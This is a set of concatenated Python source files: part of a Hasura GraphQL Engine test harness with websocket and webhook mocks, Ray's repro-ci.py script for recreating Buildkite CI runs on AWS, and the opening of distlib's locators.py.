def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'complete':
self.ws_active_query_ids.discard( frame.get('id') )
elif frame.get('type') == 'subscribe' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(5)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'complete'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
graphql.parse(query['query'])
if headers and len(headers) > 0:
#Do init If headers are provided
self.clear_queue()
self.init(headers)
elif not self.init_done:
self.init()
if query_id == None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'subscribe',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
if json_msg['type'] == 'ping':
new_msg = json_msg
new_msg['type'] = 'pong'
self.send(json.dumps(new_msg))
return
if 'id' in json_msg:
query_id = json_msg['id']
if json_msg.get('type') == 'complete':
#Remove from active queries list
self.ws_active_query_ids.discard( query_id )
if not query_id in self.ws_id_query_queues:
self.ws_id_query_queues[json_msg['id']] = queue.Queue(maxsize=-1)
#Put event in the correponding query_queue
self.ws_id_query_queues[query_id].put(json_msg)
if json_msg['type'] != 'ping':
self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def get_conn_close_state(self):
return self.remote_closed or self.is_closing
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
class ActionsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
self.req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(self.req_json))
if req_path == "/create-user":
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-user-timeout":
time.sleep(3)
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-users":
resp, status = self.create_users()
self._send_response(status, resp)
elif req_path == "/invalid-response":
self._send_response(HTTPStatus.OK, "some-string")
elif req_path == "/mirror-action":
resp, status = self.mirror_action()
self._send_response(status, resp)
elif req_path == "/get-user-by-email":
resp, status = self.get_users_by_email(True)
self._send_response(status, resp)
elif req_path == "/get-users-by-email":
resp, status = self.get_users_by_email(False)
self._send_response(status, resp)
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
def create_user(self):
email_address = self.req_json['input']['email']
name = self.req_json['input']['name']
if not self.check_email(email_address):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($email: String! $name: String!) {
insert_user_one(object: {email: $email, name: $name}){
id
}
}
'''
query = {
'query': gql_query,
'variables': {
'email': email_address,
'name': name
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user_one']
return response, HTTPStatus.OK
def create_users(self):
inputs = self.req_json['input']['users']
for input in inputs:
email_address = input['email']
if not self.check_email(email_address):
response = {
'message': 'Email address is not valid: ' + email_address,
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($insert_inputs: [user_insert_input!]!){
insert_user(objects: $insert_inputs){
returning{
id
}
}
}
'''
query = {
'query': gql_query,
'variables': {
'insert_inputs': inputs
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user']['returning']
return response, HTTPStatus.OK
def mirror_action(self):
response = self.req_json['input']['arg']
return response, HTTPStatus.OK
def get_users_by_email(self, singleUser = False):
email = self.req_json['input']['email']
if not self.check_email(email):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
query get_user($email:String!) {
user(where:{email:{_eq:$email}},order_by: {id: asc}) {
id
}
}
'''
query = {
'query': gql_query,
'variables':{
'email':email
}
}
code,resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
if singleUser:
return resp['data']['user'][0], HTTPStatus.OK
else:
return resp['data']['user'], HTTPStatus.OK
def check_email(self, email):
regex = '^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
return re.search(regex,email)
def execute_query(self, query):
headers = {}
admin_secret = self.hge_ctx.hge_key
if admin_secret is not None:
headers['X-Hasura-Admin-Secret'] = admin_secret
code, resp, _ = self.hge_ctx.anyq('/v1/graphql', query, headers)
self.log_message(json.dumps(resp))
return code, resp
def _send_response(self, status, body):
self.log_request(status)
self.send_response_only(status)
self.send_header('Content-Type', 'application/json')
self.send_header('Set-Cookie', 'abcd')
self.end_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
class ActionsWebhookServer(http.server.HTTPServer):
def __init__(self, hge_ctx, server_address):
handler = ActionsWebhookHandler
handler.hge_ctx = hge_ctx
super().__init__(server_address, handler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class EvtsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(req_json))
if req_path == "/fail":
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR)
self.end_headers()
# This endpoint just sleeps for 2 seconds:
elif req_path == "/sleep_2s":
time.sleep(2)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
# This is like a sleep endpoint above, but allowing us to decide
# externally when the webhook can return, with unblock()
elif req_path == "/block":
if not self.server.unblocked:
self.server.blocked_count += 1
with self.server.unblocked_wait:
# We expect this timeout never to be reached, but if
# something goes wrong the main thread will block forever:
self.server.unblocked_wait.wait(timeout=60)
self.server.blocked_count -= 1
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
# A very slightly more sane/performant http server.
# See: https://stackoverflow.com/a/14089457/176841
#
# TODO use this elsewhere, or better yet: use e.g. bottle + waitress
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
"""Handle requests in a separate thread."""
class EvtsWebhookServer(ThreadedHTTPServer):
def __init__(self, server_address):
# Data received from hasura by our web hook, pushed after it returns to the client:
self.resp_queue = queue.Queue()
# We use these two vars to coordinate unblocking in the /block route
self.unblocked = False
self.unblocked_wait = threading.Condition()
# ...and this for bookkeeping open blocked requests; this becomes
# meaningless after the first call to unblock()
self.blocked_count = 0
super().__init__(server_address, EvtsWebhookHandler)
# Unblock all webhook requests to /block. Idempotent.
def unblock(self):
self.unblocked = True
with self.unblocked_wait:
# NOTE: this only affects currently wait()-ing threads, future
# wait()s will block again (hence the simple self.unblocked flag)
self.unblocked_wait.notify_all()
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def get_event(self, timeout):
return self.resp_queue.get(timeout=timeout)
def is_queue_empty(self):
return self.resp_queue.empty
def teardown(self):
self.evt_trggr_httpd.shutdown()
self.evt_trggr_httpd.server_close()
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.evt_trggr_web_server.join()
class HGECtxGQLServer:
def __init__(self, hge_urls, port=5000):
# start the graphql server
self.port = port
self._hge_urls = hge_urls
self.is_running = False
self.start_server()
def start_server(self):
if not self.is_running:
self.graphql_server = graphql_server.create_server('127.0.0.1', self.port)
self.hge_urls = graphql_server.set_hge_urls(self._hge_urls)
self.gql_srvr_thread = threading.Thread(target=self.graphql_server.serve_forever)
self.gql_srvr_thread.start()
self.is_running = True
def teardown(self):
self.stop_server()
def stop_server(self):
if self.is_running:
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.is_running = False
class HGECtx:
def __init__(self, hge_url, pg_url, config):
self.http = requests.Session()
self.hge_key = config.getoption('--hge-key')
self.hge_url = hge_url
self.pg_url = pg_url
self.hge_webhook = config.getoption('--hge-webhook')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
if hge_jwt_key_file is None:
self.hge_jwt_key = None
else:
with open(hge_jwt_key_file) as f:
self.hge_jwt_key = f.read()
self.hge_jwt_conf = config.getoption('--hge-jwt-conf')
if self.hge_jwt_conf is not None:
self.hge_jwt_conf_dict = json.loads(self.hge_jwt_conf)
self.hge_jwt_algo = self.hge_jwt_conf_dict["type"]
if self.hge_jwt_algo == "Ed25519":
self.hge_jwt_algo = "EdDSA"
self.webhook_insecure = config.getoption('--test-webhook-insecure')
self.metadata_disabled = config.getoption('--test-metadata-disabled')
self.may_skip_test_teardown = False
self.function_permissions = config.getoption('--test-function-permissions')
# This will be GC'd, but we also explicitly dispose() in teardown()
self.engine = create_engine(self.pg_url)
self.meta = MetaData()
self.ws_read_cookie = config.getoption('--test-ws-init-cookie')
self.hge_scale_url = config.getoption('--test-hge-scale-url')
self.avoid_err_msg_checks = config.getoption('--avoid-error-message-checks')
self.inherited_roles_tests = config.getoption('--test-inherited-roles')
self.pro_tests = config.getoption('--pro-tests')
self.ws_client = GQLWsClient(self, '/v1/graphql')
self.ws_client_v1alpha1 = GQLWsClient(self, '/v1alpha1/graphql')
self.ws_client_relay = GQLWsClient(self, '/v1beta1/relay')
self.ws_client_graphql_ws = GraphQLWSClient(self, '/v1/graphql')
self.backend = config.getoption('--backend')
self.default_backend = 'postgres'
self.is_default_backend = self.backend == self.default_backend
# HGE version
result = subprocess.run(['../../scripts/get-version.sh'], shell=False, stdout=subprocess.PIPE, check=True)
env_version = os.getenv('VERSION')
self.version = env_version if env_version else result.stdout.decode('utf-8').strip()
if self.is_default_backend and not self.metadata_disabled and not config.getoption('--skip-schema-setup'):
try:
st_code, resp = self.v2q_f("queries/" + self.backend_suffix("clear_db")+ ".yaml")
except requests.exceptions.RequestException as e:
self.teardown()
raise HGECtxError(repr(e))
assert st_code == 200, resp
# Postgres version
if self.is_default_backend:
pg_version_text = self.sql('show server_version_num').fetchone()['server_version_num']
self.pg_version = int(pg_version_text)
def reflect_tables(self):
self.meta.reflect(bind=self.engine)
def anyq(self, u, q, h, b = None, v = None):
resp = None
if v == 'GET':
resp = self.http.get(
self.hge_url + u,
headers=h
)
elif v == 'POST' and b:
# TODO: Figure out why the requests are failing with a byte object passed in as `data`
resp = self.http.post(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PATCH' and b:
resp = self.http.patch(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'PUT' and b:
resp = self.http.put(
self.hge_url + u,
data=b,
headers=h
)
elif v == 'DELETE':
resp = self.http.delete(
self.hge_url + u,
headers=h
)
else:
resp = self.http.post(
self.hge_url + u,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
# Returning response headers to get the request id from response
return resp.status_code, resp.json(object_pairs_hook=OrderedDict), resp.headers
def sql(self, q):
conn = self.engine.connect()
res = conn.execute(q)
conn.close()
return res
def execute_query(self, q, url_path, headers = {}):
h = headers.copy()
if self.hge_key is not None:
h['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(
self.hge_url + url_path,
json=q,
headers=h
)
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
return resp.status_code, resp.json(object_pairs_hook=OrderedDict)
def v1q(self, q, headers = {}):
return self.execute_query(q, "/v1/query", headers)
def v1q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1q(yml.load(f))
def v2q(self, q, headers = {}):
return self.execute_query(q, "/v2/query", headers)
def v2q_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v2q(yml.load(f))
def backend_suffix(self, filename):
if self.is_default_backend:
return filename
else:
return filename + "_" + self.backend
def v1metadataq(self, q, headers = {}):
return self.execute_query(q, "/v1/metadata", headers)
def v1metadataq_f(self, fn):
with open(fn) as f:
# NOTE: preserve ordering with ruamel
yml = yaml.YAML()
return self.v1metadataq(yml.load(f))
def teardown(self):
self.http.close()
self.engine.dispose()
# Close websockets:
self.ws_client.teardown()
self.ws_client_v1alpha1.teardown()
self.ws_client_relay.teardown()
self.ws_client_graphql_ws.teardown()
def v1GraphqlExplain(self, q, hdrs=None):
headers = {}
if hdrs != None:
headers = hdrs
if self.hge_key != None:
headers['X-Hasura-Admin-Secret'] = self.hge_key
resp = self.http.post(self.hge_url + '/v1/graphql/explain', json=q, headers=headers)
return resp.status_code, resp.json()
|
repro-ci.py
|
"""Create an AWS instance to reproduce Buildkite CI builds.
This script will take a Buildkite build URL as an argument and create
an AWS instance with the same properties running the same Docker container
as the original Buildkite runner. The user is then attached to this instance
and can reproduce any builds commands as if they were executed within the
runner.
This utility can be used to reproduce and debug build failures that come up
on the Bildkite runner instances but not on a local machine.
Optionally, build commands can be executed automatically. Filters can be added
to exclude some of these commands. For instance, some users may want to execute
all build commands except for the `bazel build` commands, which they would
like to execute manually.
Usage:
python repro-ci.py [-n instance-name] [-c] [-f filter1] [-f filter2] ...
Arguments:
-n: Instance name to be used. If an instance with this name already exists,
it will be reused.
-c: Execute commands after setting up the machine.
-f: Filter these commands (do not execute commands that match this
regex pattern).
"""
import base64
import json
import logging
import os
import random
import re
import shlex
import subprocess
import threading
import time
from numbers import Number
from typing import Any, Dict, List, Optional, Callable
import boto3
import click
import paramiko
import yaml
from pybuildkite.buildkite import Buildkite
def maybe_fetch_buildkite_token():
if os.environ.get("BUILDKITE_TOKEN", None) is None:
print("Missing BUILDKITE_TOKEN, retrieving from AWS secrets store")
os.environ["BUILDKITE_TOKEN"] = boto3.client(
"secretsmanager", region_name="us-west-2"
).get_secret_value(
SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
"buildkite/ro-token")["SecretString"]
def escape(v: Any):
if isinstance(v, bool):
return f"{int(v)}"
elif isinstance(v, Number):
return str(v)
elif isinstance(v, list):
return " ".join(shlex.quote(w) for w in v)
else:
return v
def env_str(env: Dict[str, Any]):
kvs = []
for k, v in env.items():
if isinstance(v, bool):
kvs.append((k, int(v)))
elif isinstance(v, Number):
kvs.append((k, str(v)))
elif isinstance(v, list):
for i, w in enumerate(v):
kvs.append((f"{k}_{i}", w))
else:
kvs.append((k, v))
return " ".join(f"{k}={shlex.quote(v)}" for k, v in kvs)
def script_str(v: Any):
if isinstance(v, bool):
return f"\"{int(v)}\""
elif isinstance(v, Number):
return f"\"{v}\""
elif isinstance(v, list):
return "(" + " ".join(f"\"{shlex.quote(w)}\"" for w in v) + ")"
else:
return f"\"{shlex.quote(v)}\""
class ReproSession:
plugin_default_env = {
"docker": {
"BUILDKITE_PLUGIN_DOCKER_MOUNT_BUILDKITE_AGENT": False
}
}
def __init__(self,
buildkite_token: str,
instance_name: str = "repro-ci-dev",
logger: Optional[logging.Logger] = None):
self.logger = logger or logging.getLogger(self.__class__.__name__)
self.bk = Buildkite()
self.bk.set_access_token(buildkite_token)
self.ssh_user = "ec2-user"
self.ssh_key_name = "buildkite-repro-env"
self.ssh_key_file = "~/.ssh/buildkite-repro-env.pem"
self.ec2_client = boto3.client("ec2", region_name="us-west-2")
self.ec2_resource = boto3.resource("ec2", region_name="us-west-2")
self.org = None
self.pipeline = None
self.build_id = None
self.job_id = None
self.env: Dict[str, str] = {}
self.aws_instance_name = instance_name
self.aws_instance_id = None
self.aws_instance_ip = None
self.ssh = None
self.plugins = {}
self.skipped_commands = []
def set_session(self, session_url: str):
# E.g.:
# https://buildkite.com/ray-project/ray-builders-pr/
# builds/19635#55a0d71a-831e-4f68-b668-2b10c6f65ee6
pattern = re.compile(
"https://buildkite.com/([^/]+)/([^/]+)/builds/([0-9]+)#(.+)")
org, pipeline, build_id, job_id = pattern.match(session_url).groups()
self.logger.debug(f"Parsed session URL: {session_url}. "
f"Got org='{org}', pipeline='{pipeline}', "
f"build_id='{build_id}', job_id='{job_id}'.")
self.org = org
self.pipeline = pipeline
self.build_id = build_id
self.job_id = job_id
def fetch_env_variables(self, overwrite: Optional[Dict[str, Any]] = None):
assert self.bk
self.env = self.bk.jobs().get_job_environment_variables(
self.org, self.pipeline, self.build_id, self.job_id)["env"]
if overwrite:
self.env.update(overwrite)
return self.env
def aws_start_instance(self):
assert self.env
instance_type = self.env["BUILDKITE_AGENT_META_DATA_AWS_INSTANCE_TYPE"]
instance_ami = self.env["BUILDKITE_AGENT_META_DATA_AWS_AMI_ID"]
instance_sg = "sg-0ccfca2ef191c04ae"
instance_block_device_mappings = [{
"DeviceName": "/dev/xvda",
"Ebs": {
"VolumeSize": 500
}
}]
# Check if instance exists:
running_instances = self.ec2_resource.instances.filter(Filters=[{
"Name": "tag:repro_name",
"Values": [self.aws_instance_name]
}, {
"Name": "instance-state-name",
"Values": ["running"]
}])
self.logger.info(
f"Check if instance with name {self.aws_instance_name} "
f"already exists...")
for instance in running_instances:
self.aws_instance_id = instance.id
self.aws_instance_ip = instance.public_ip_address
self.logger.info(f"Found running instance {self.aws_instance_id}.")
return
self.logger.info(
f"Instance with name {self.aws_instance_name} not found, "
f"creating...")
# Else, not running, yet, start.
instance = self.ec2_resource.create_instances(
BlockDeviceMappings=instance_block_device_mappings,
ImageId=instance_ami,
InstanceType=instance_type,
KeyName=self.ssh_key_name,
SecurityGroupIds=[instance_sg],
TagSpecifications=[{
"ResourceType": "instance",
"Tags": [{
"Key": "repro_name",
"Value": self.aws_instance_name
}]
}],
MinCount=1,
MaxCount=1,
)[0]
self.aws_instance_id = instance.id
self.logger.info(
f"Created new instance with ID {self.aws_instance_id}")
def aws_wait_for_instance(self):
assert self.aws_instance_id
self.logger.info("Waiting for instance to come up...")
repro_instance_state = None
while repro_instance_state != "running":
detail = self.ec2_client.describe_instances(
InstanceIds=[self.aws_instance_id], )
repro_instance_state = \
detail["Reservations"][0]["Instances"][0]["State"]["Name"]
if repro_instance_state != "running":
time.sleep(2)
self.aws_instance_ip = detail["Reservations"][0]["Instances"][0][
"PublicIpAddress"]
def aws_stop_instance(self):
assert self.aws_instance_id
self.ec2_client.terminate_instances(
InstanceIds=[self.aws_instance_id], )
def print_stop_command(self):
click.secho("To stop this instance in the future, run this: ")
click.secho(
f"aws ec2 terminate-instances "
f"--instance-ids={self.aws_instance_id}",
bold=True)
def create_new_ssh_client(self):
assert self.aws_instance_ip
if self.ssh:
self.ssh.close()
self.logger.info(
"Creating SSH client and waiting for SSH to become available...")
ssh = paramiko.client.SSHClient()
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
timeout = time.monotonic() + 60
while time.monotonic() < timeout:
try:
ssh.connect(
self.aws_instance_ip,
username=self.ssh_user,
key_filename=os.path.expanduser(self.ssh_key_file))
break
except paramiko.ssh_exception.NoValidConnectionsError:
self.logger.info("SSH not ready, yet, sleeping 5 seconds")
time.sleep(5)
self.ssh = ssh
return self.ssh
def close_ssh(self):
self.ssh.close()
def ssh_exec(self, command, quiet: bool = False, *args, **kwargs):
result = {}
def exec():
stdin, stdout, stderr = self.ssh.exec_command(
command, get_pty=True)
output = ""
for line in stdout.readlines():
output += line
if not quiet:
print(line, end="")
for line in stderr.readlines():
if not quiet:
print(line, end="")
result["output"] = output
thread = threading.Thread(target=exec)
thread.start()
status = time.monotonic() + 30
while thread.is_alive():
thread.join(2)
if time.monotonic() >= status and thread.is_alive():
self.logger.info("Still executing...")
status = time.monotonic() + 30
thread.join()
return result.get("output", "")
def execute_ssh_command(
self,
command: str,
env: Optional[Dict[str, str]] = None,
as_script: bool = False,
quiet: bool = False,
command_wrapper: Optional[Callable[[str], str]] = None) -> str:
assert self.ssh
if not command_wrapper:
def command_wrapper(s):
return s
full_env = self.env.copy()
if env:
full_env.update(env)
if as_script:
ftp = self.ssh.open_sftp()
file = ftp.file("/tmp/script.sh", "w", -1)
file.write("#!/bin/bash\n")
for k, v in env.items():
file.write(f"{k}={script_str(v)}\n")
file.write(command + "\n")
file.flush()
ftp.close()
full_command = "bash /tmp/script.sh"
else:
full_command = f"export {env_str(full_env)}; {command}"
full_command = command_wrapper(full_command)
self.logger.debug(f"Executing command: {command}")
output = self.ssh_exec(full_command, quiet=quiet, get_pty=True)
return output
def execute_ssh_commands(self,
commands: List[str],
env: Optional[Dict[str, str]] = None,
quiet: bool = False):
for command in commands:
self.execute_ssh_command(command, env=env, quiet=quiet)
def execute_docker_command(self,
command: str,
env: Optional[Dict[str, str]] = None,
quiet: bool = False):
def command_wrapper(s):
escaped = s.replace("'", "'\"'\"'")
return f"docker exec -it ray_container /bin/bash -ci '{escaped}'"
self.execute_ssh_command(
command, env=env, quiet=quiet, command_wrapper=command_wrapper)
def prepare_instance(self):
self.create_new_ssh_client()
output = self.execute_ssh_command("docker ps", quiet=True)
if "CONTAINER ID" in output:
self.logger.info("Instance already prepared.")
return
self.logger.info("Preparing instance (installing docker etc.)")
commands = [
"sudo yum install -y docker", "sudo service docker start",
f"sudo usermod -aG docker {self.ssh_user}"
]
self.execute_ssh_commands(commands, quiet=True)
self.create_new_ssh_client()
self.execute_ssh_command("docker ps", quiet=True)
self.docker_login()
def docker_login(self):
self.logger.info("Logging into docker...")
credentials = boto3.client(
"ecr", region_name="us-west-2").get_authorization_token()
token = base64.b64decode(credentials["authorizationData"][0][
"authorizationToken"]).decode("utf-8").replace("AWS:", "")
endpoint = credentials["authorizationData"][0]["proxyEndpoint"]
self.execute_ssh_command(
f"docker login -u AWS -p {token} {endpoint}", quiet=True)
def fetch_buildkite_plugins(self):
assert self.env
self.logger.info("Fetching Buildkite plugins")
plugins = json.loads(self.env["BUILDKITE_PLUGINS"])
for collection in plugins:
for plugin, options in collection.items():
plugin_url, plugin_version = plugin.split("#")
if not plugin_url.startswith(
"http://") or not plugin_url.startswith("https://"):
plugin_url = f"https://{plugin_url}"
plugin_name = plugin_url.split("/")[-1].rstrip(".git")
plugin_short = plugin_name.replace("-buildkite-plugin", "")
plugin_dir = f"~/{plugin_name}"
plugin_env = self.get_plugin_env(plugin_short, options)
self.plugins[plugin_short] = {
"name": plugin_name,
"options": options,
"short": plugin_short,
"url": plugin_url,
"version": plugin_version,
"dir": plugin_dir,
"env": plugin_env,
"details": {}
}
def get_plugin_env(self, plugin_short: str, options: Dict[str, Any]):
plugin_env = {}
for option, value in options.items():
option_name = option.replace("-", "_").upper()
env_name = f"BUILDKITE_PLUGIN_{plugin_short.upper()}_{option_name}"
plugin_env[env_name] = value
plugin_env.update(self.plugin_default_env.get(plugin_short, {}))
return plugin_env
def install_buildkite_plugin(self, plugin: str):
assert plugin in self.plugins
self.logger.info(f"Installing Buildkite plugin: {plugin}")
plugin_dir = self.plugins[plugin]["dir"]
plugin_url = self.plugins[plugin]["url"]
plugin_version = self.plugins[plugin]["version"]
self.execute_ssh_command(
f"[ ! -e {plugin_dir} ] && git clone --depth 1 "
f"--branch {plugin_version} {plugin_url} {plugin_dir}",
quiet=True)
def load_plugin_details(self, plugin: str):
assert plugin in self.plugins
plugin_dir = self.plugins[plugin]["dir"]
yaml_str = self.execute_ssh_command(
f"cat {plugin_dir}/plugin.yml", quiet=True)
details = yaml.safe_load(yaml_str)
self.plugins[plugin]["details"] = details
return details
def execute_plugin_hook(self,
plugin: str,
hook: str,
env: Optional[Dict[str, Any]] = None,
script_command: Optional[str] = None):
assert plugin in self.plugins
self.logger.info(
f"Executing Buildkite hook for plugin {plugin}: {hook}. "
f"This pulls a Docker image and could take a while.")
plugin_dir = self.plugins[plugin]["dir"]
plugin_env = self.plugins[plugin]["env"].copy()
if env:
plugin_env.update(env)
script_command = script_command or "bash -l"
hook_script = f"{plugin_dir}/hooks/{hook}"
self.execute_ssh_command(
f"[ -f {hook_script} ] && cat {hook_script} | {script_command} ",
env=plugin_env,
as_script=False,
quiet=True,
)
def print_buildkite_command(self, skipped: bool = False):
print("-" * 80)
print("These are the commands you need to execute to fully reproduce "
"the run")
print("-" * 80)
print(self.env["BUILDKITE_COMMAND"])
print("-" * 80)
if skipped and self.skipped_commands:
print("Some of the commands above have already been run. "
"Remaining commands:")
print("-" * 80)
print("\n".join(self.skipped_commands))
print("-" * 80)
def run_buildkite_command(self,
command_filter: Optional[List[str]] = None):
commands = self.env["BUILDKITE_COMMAND"].split("\n")
regexes = [re.compile(cf) for cf in command_filter or []]
skipped_commands = []
for command in commands:
if any(rx.search(command) for rx in regexes):
self.logger.info(f"Filtered build command: {command}")
skipped_commands.append(command)
continue
self.logger.info(f"Executing build command: {command}")
self.execute_docker_command(command)
self.skipped_commands = skipped_commands
def transfer_env_to_container(self):
escaped = env_str(self.env).replace("'", "'\"'\"'")
self.execute_docker_command(
f"grep -q 'source ~/.env' $HOME/.bashrc "
f"|| echo 'source ~/.env' >> $HOME/.bashrc; "
f"echo 'export {escaped}' > $HOME/.env",
quiet=True)
def attach_to_container(self):
self.logger.info("Attaching to AWS instance...")
ssh_command = (f"ssh -ti {self.ssh_key_file} "
f"-o StrictHostKeyChecking=no "
f"-o ServerAliveInterval=30 "
f"{self.ssh_user}@{self.aws_instance_ip} "
f"'docker exec -it ray_container bash -l'")
subprocess.run(ssh_command, shell=True)
@click.command()
@click.argument("session_url", required=False)
@click.option("-n", "--instance-name", default="repro-ci-dev")
@click.option("-c", "--commands", is_flag=True, default=False)
@click.option("-f", "--filters", multiple=True, default=[])
def main(session_url: Optional[str],
instance_name: str = "repro-ci-dev",
commands: bool = False,
filters: Optional[List[str]] = None):
random.seed(1235)
logger = logging.getLogger("main")
logger.setLevel(logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(
logging.Formatter("[%(levelname)s %(asctime)s] "
"%(filename)s: %(lineno)d "
"%(message)s"))
logger.addHandler(handler)
maybe_fetch_buildkite_token()
repro = ReproSession(
os.environ["BUILDKITE_TOKEN"],
instance_name=instance_name,
logger=logger)
session_url = session_url or click.prompt(
"Please copy and paste the Buildkite job build URI here")
repro.set_session(session_url)
repro.fetch_env_variables()
repro.aws_start_instance()
repro.aws_wait_for_instance()
print("-" * 80)
click.secho("Instance ID: ", nl=False)
click.secho(repro.aws_instance_id, bold=True)
click.secho("Instance IP: ", nl=False)
click.secho(repro.aws_instance_ip, bold=True)
print("-" * 80)
logger.info(f"Instance IP: {repro.aws_instance_ip}")
repro.prepare_instance()
repro.docker_login()
repro.fetch_buildkite_plugins()
for plugin in repro.plugins:
repro.install_buildkite_plugin(plugin)
repro.execute_plugin_hook("dind", "pre-command")
repro.execute_plugin_hook(
"docker",
"command",
env={
"BUILDKITE_COMMAND": "sleep infinity",
"BUILDKITE_PLUGIN_DOCKER_TTY": "0",
"BUILDKITE_PLUGIN_DOCKER_MOUNT_CHECKOUT": "0",
},
script_command=("sed -E 's/"
"docker run/"
"docker run --name ray_container -d/g' | "
"bash -l"))
repro.create_new_ssh_client()
repro.print_buildkite_command()
if commands:
filters = filters or []
repro.run_buildkite_command(command_filter=filters)
repro.print_buildkite_command(skipped=True)
repro.transfer_env_to_container()
repro.attach_to_container()
logger.info("You are now detached from the AWS instance.")
if click.confirm("Stop AWS instance?", default=False):
repro.aws_stop_instance()
else:
repro.print_stop_command()
if __name__ == "__main__":
main()
|
locators.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError:
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile('^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'http://python.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
